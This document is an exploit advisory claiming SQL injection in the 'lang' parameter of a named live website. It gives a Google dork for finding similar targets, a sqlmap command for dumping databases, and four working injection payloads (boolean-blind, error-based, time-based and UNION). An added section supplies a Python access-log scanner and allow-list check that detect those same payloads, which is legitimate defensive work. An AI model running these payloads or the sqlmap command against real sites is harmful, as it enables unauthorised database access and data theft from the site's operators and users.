|===========================================================================
| # Exploit Title : mmcct | SQL injection Vulnerability
|
| # Author : Ali Seddigh
|
| # Category : Web Application
|
| # Google Dork : inurl:members.php?lang=en
|
| # Software Link : www.mmcct.mu
|
| # Tested on : [ Windows ~> 10 ]
|
| # Vulnerable Path : https://www.mmcct.mu/pages/board_of_members.php?lang=en
|
| # Date : 2021-04-10
|===========================================================================
| << Demo on sqlmap >>
|
| # Vulnerable Parameter [lang]
| # sqlmap Query : python sqlmap.py -u "https://www.mmcct.mu/pages/board_of_members.php?lang=en" --dbs
|
|===========================================================================
# POC :
Parameter: lang (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: lang=en' AND 7723=7723 AND 'LkKJ'='LkKJ

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: lang=en' AND (SELECT 9975 FROM(SELECT COUNT(*),CONCAT(0x716a716271,(SELECT (ELT(9975=9975,1))),0x716b786a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'FthE'='FthE

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: lang=en' AND (SELECT 3032 FROM (SELECT(SLEEP(5)))bdHq) AND 'Xbrs'='Xbrs

    Type: UNION query
    Title: Generic UNION query (NULL) - 15 columns
    Payload: lang=-5281' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,CONCAT(0x716a716271,0x7359437a426369794d525a5a7a46666557477368564172425a434b62755877416d527a5850704a64,0x716b786a71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -
|===========================================================================
| # Discovered By : Ali Triplex
|===========================================================================
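
Detection side of the PoC above, as an added example that is not part of the original advisory: it decodes the `lang` parameter from web access-log lines, rejects anything outside an allow-list of language codes, and labels the technique families listed in the sqlmap output. The allow-list contents, the combined-log layout, the client IPs and the helper names are assumptions made for illustration.

```python
import re
from urllib.parse import parse_qs, quote, urlsplit

ALLOWED_LANGS = {"en", "fr"}  # assumption: the language codes the site serves

# One marker per technique family listed in the PoC output above.
SQLI_MARKERS = {
    "boolean-based": re.compile(r"'\s*(?:and|or)\s+[\w']+\s*=\s*[\w']+", re.I),
    "error-based": re.compile(r"information_schema|floor\s*\(\s*rand", re.I),
    "time-based": re.compile(r"\b(?:sleep|benchmark)\s*\(", re.I),
    "union": re.compile(r"\bunion\b.*\bselect\b", re.I | re.S),
}
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def classify_lang(value):
    """Return [] for an allowed code, else matched families or ['not-allowed']."""
    if value in ALLOWED_LANGS:
        return []
    hits = [name for name, rx in SQLI_MARKERS.items() if rx.search(value)]
    return hits or ["not-allowed"]

def scan_access_log(lines):
    """Yield (client_ip, decoded_lang, findings) for each suspicious request."""
    for line in lines:
        m = REQUEST.search(line)
        if not m:
            continue
        for value in parse_qs(urlsplit(m.group(1)).query).get("lang", []):
            findings = classify_lang(value)
            if findings:
                yield line.split()[0], value, findings

def sample_line(ip, lang):
    """Build a constructed combined-log line for the path named in the advisory."""
    return (f'{ip} - - [10/Apr/2021:10:00:00 +0000] '
            f'"GET /pages/board_of_members.php?lang={quote(lang)} HTTP/1.1" 200 512')

# Constructed sample log; values are the ones quoted in the PoC (UNION shortened).
SAMPLE_LOG = [
    sample_line("203.0.113.5", "en"),
    sample_line("203.0.113.9", "en' AND 7723=7723 AND 'LkKJ'='LkKJ"),
    sample_line("203.0.113.9", "en' AND (SELECT 3032 FROM (SELECT(SLEEP(5)))bdHq) AND 'Xbrs'='Xbrs"),
    sample_line("203.0.113.9", "-5281' UNION ALL SELECT NULL,NULL,NULL-- -"),
    sample_line("203.0.113.7", "de"),
]

if __name__ == "__main__":
    for ip, value, findings in scan_access_log(SAMPLE_LOG):
        print(ip, findings, repr(value))
```

The same allow-list check belongs in the application before `lang` reaches any query, alongside parameterized statements; the regex markers only help triage what the allow-list already rejected.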